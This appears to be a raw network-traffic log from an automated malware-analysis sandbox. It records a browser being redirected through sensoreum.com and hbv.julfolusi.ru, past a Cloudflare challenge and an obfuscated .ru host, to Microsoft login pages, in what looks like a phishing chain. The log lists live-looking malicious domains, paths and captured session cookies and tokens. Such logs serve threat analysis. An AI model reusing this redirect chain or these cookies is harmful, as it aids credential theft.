Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jantaexpress.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: sensoreum.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /CZ8MDTsC/ HTTP/1.1Host: hbv.julfolusi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://sensoreum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hbv.julfolusi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hbv.julfolusi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/672eb098a9f3/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hbv.julfolusi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hbv.julfolusi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/672eb098a9f3/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://hbv.julfolusi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=904f584ecef78c84&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: hbv.julfolusi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hbv.julfolusi.ru/CZ8MDTsC/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IndzN041cXlTSkpmOWh1RFNQTkJOMVE9PSIsInZhbHVlIjoiYzhqaG1lOGdMTUVray9GNnZYV1A5NThteFJoNEJUenJxVUNDQ01oV21RUU5tZytMUmE4eDRoc1Rsc0V4MTRJOTQwTUt3elVSMUkwZnMvT2xsYlh3TEt6VjlQTmxRcXZWVTIvZFVIOGdrMGE5ems2R3R3ckxBeXpQTVN4eHdNNUYiLCJtYWMiOiIwMGQ5NDlmZjcyN2ZlZDIyYjE5ZGY5NDNiODY4NjNkMDhjOWRmNDI5M2M2NWIyY2ZjOTg0ZmQ4ZTZiZWY1YWM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ijg4dFppd0EyTWJQWW1LOTIyMGFJRlE9PSIsInZhbHVlIjoiL0k3Z0hIZXRrUFVobU90cGtOYzVKdmhlZGhidXBhTFluL20vMnJjZG9qOElKREwvUzZoTDFUbDU4aHphRksvaWpDOTlUN3QxMUtZenVSemx1MGxDMFBna2R4NGJEbEJSaklLV0hEK1JNWXNrZldoZnA5T2N1eU1rRFYzY2pTb0EiLCJtYWMiOiI1NTk5YzY0ZjJiMjYyOTgyZmY5NGMzYmYyZjVkNmY1N2U4ZDJhNThlN2YzMDRlMGI3MWRkNjg1YzAzMzQ4YmQ2IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=904f584ecef78c84&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/904f584ecef78c84/1737379050574/6d3f33c5b10c262f317bed783b809dbc85efecad46729463c647b32eaa53d57b/QHQMfPl58w8-qkH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/904f584ecef78c84/1737379050574/WYedaWt9jSXybE_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/904f584ecef78c84/1737379050574/WYedaWt9jSXybE_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dtcfafzhwhbirleqzDLxHVTpKrHALYIVUMFBINZGSUUULWLEGTEAEFQVIEXDSLXWNQQCPJZUMVLDF HTTP/1.1Host: pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hbv.julfolusi.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hbv.julfolusi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dtcfafzhwhbirleqzDLxHVTpKrHALYIVUMFBINZGSUUULWLEGTEAEFQVIEXDSLXWNQQCPJZUMVLDF HTTP/1.1Host: pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: www.office.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://hbv.julfolusi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/GetCredentialType?mkt=en-US HTTP/1.1Host: login.microsoftonline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-yXUcgnF8TI=AQABCQEAAABVrSpeuWamRam2jAF1XRQEGoOtfMrnyk08QeLX2PlFKyVsIRKF4WbGDPvl1Aa8jOiaAq5nzkZ8BaRzaYv3-uuNpSTpUuf0JrIh76OTbazaLzwAIH6xogKfQOqgrLs0vRmrBuq9tNXf-wNoZAjTi5RbfR7F_SJsFoqEhr7Z-kwn7CAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.ASUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAAlAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEHktZan4nERxmNuphsX30piS9djgRxdmuQbBSJ2qUggoXw06VTH_Zpg9F-0yk-sCB4B58jNPZZRXJVcxM_nGuIYcUoEtE9fCO0W7plMjqVTEgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQET_Y8dy1-R8rwLiJtG7HfzspHve935_usTVsVEtF0Ffy9lk0j_MOS0KbbdeUlLyL4hJmwLY5LTdg2kitzVhjB6RetDbgayjQu0KiJbVc6_kv5tM5OapkgIR0aGC1MjIOD-GMaIMKKc6LCr-JvHG6PH0lV3T9I-GxngeSgFhV5mEUgAA; esctx-yDQvoAkW4dg=AQABCQEAAABVrSpeuWamRam2jAF1XRQE70zu-t5Z8CFkc0uIgFp-SzpkMXNvm2cvdCOEnySrYLDGn6-7Lq-ap0EDxGJobpDeX3-qvwqOSWeqU0G-7QIK4BamdzEaOi6XkyuXpT_KTVQv8TwPDFTvnCU1vAvNRHChWvxH79sO8807QxH84yvrLiAA; fpc=AnJjeWwRx2JHkWLbimSsPWe8Ae7AAQAAAPlDIN8OAAAA; MicrosoftApplicationsTelemetryDeviceId=5b72fa91-d1d8-4ebb-bde4-c6b318d1b83b; brcap=0; ai_session=AbZ5WK4mGhLJGMzp1tFJmD|1737379069723|1737379069723; MSFPC=GUID=b023882ce14546d798ab7b6e764acc51&HASH=b023&LV=202501&V=4&LU=1737379075139
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: sensoreum.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: f9c8d8e55=d8e5539e31d8
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sensoreum.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://sensoreum.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: f9c8d8e55=d8e5539e31d8
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: jantaexpress.com
Source: global trafficDNS traffic detected: DNS query: sensoreum.com
Source: global trafficDNS traffic detected: DNS query: hbv.julfolusi.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3206sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azfsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Jan 2025 13:17:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GA0KAF6bvAJqRzc9MT1TOuiCu7hTdqEDnnOwxXUGv9AwdQPkS7xFpUL%2BnFhtIWMNaUI3Z6mHq0oWe0I4VA8%2BVw17GcNYUd4ceEK%2BhcVdhPNeC5tDa%2FTmYZIaivx%2BYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=73005&min_rtt=73000&rtt_var=27385&sent=4&recv=8&lost=0&retrans=2&sent_bytes=2824&recv_bytes=2133&delivery_rate=38991&cwnd=54&unsent_bytes=0&cid=341563a0532db79e&ts=400&x=0"CF-Cache-Status: HITAge: 7375Server: cloudflareCF-RAY: 904f5855e9fc9c24-IADserver-timing: cfL4;desc="?proto=TCP&rtt=7168&min_rtt=7168&rtt_var=2688&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1898&delivery_rate=407366&cwnd=32&unsent_bytes=0&cid=5149a4fa1a4e2c2d&ts=4726&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 20 Jan 2025 13:17:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e bf 0a c2 30 10 c6 77 c1 77 38 1f 20 44 a1 63 c8 22 0a 0e ba f8 04 a9 77 36 81 34 57 ae 71 c8 db 9b 6a 0b e2 ec e8 74 dc f7 e7 c7 67 7c ee a3 5d af 8c 27 87 d6 e4 90 23 d9 66 db c0 85 33 1c f9 91 d0 e8 b7 68 f4 2b 52 a3 2d 63 99 ee 8d 52 26 b1 c6 ef be 1b 55 31 7a b6 27 76 0d cd 1f 0f 94 84 c6 5c 3e 7d bd 10 f5 b2 66 a3 14 38 18 1c 62 48 1d 64 06 0c a3 6b 23 c1 f9 7a 3a 80 4b 08 7b 2f dc 13 dc 25 50 c2 58 80 44 58 6a a3 23 50 ea 8f f8 35 e2 09 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90ww8 Dc"w64Wqjtg|]'#f3h+R-cR&U1z'v\>}f8bHdk#z:K{/%PXDXj#P5(0
Source: chromecache_151.3.drString found in binary or memory: http://sensoreum.com/
Source: chromecache_146.3.dr, chromecache_135.3.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_146.3.dr, chromecache_135.3.drString found in binary or memory: https://login.windows-ppe.net
Source: chromecache_145.3.drString found in binary or memory: https://sensoreum.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 54837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54838
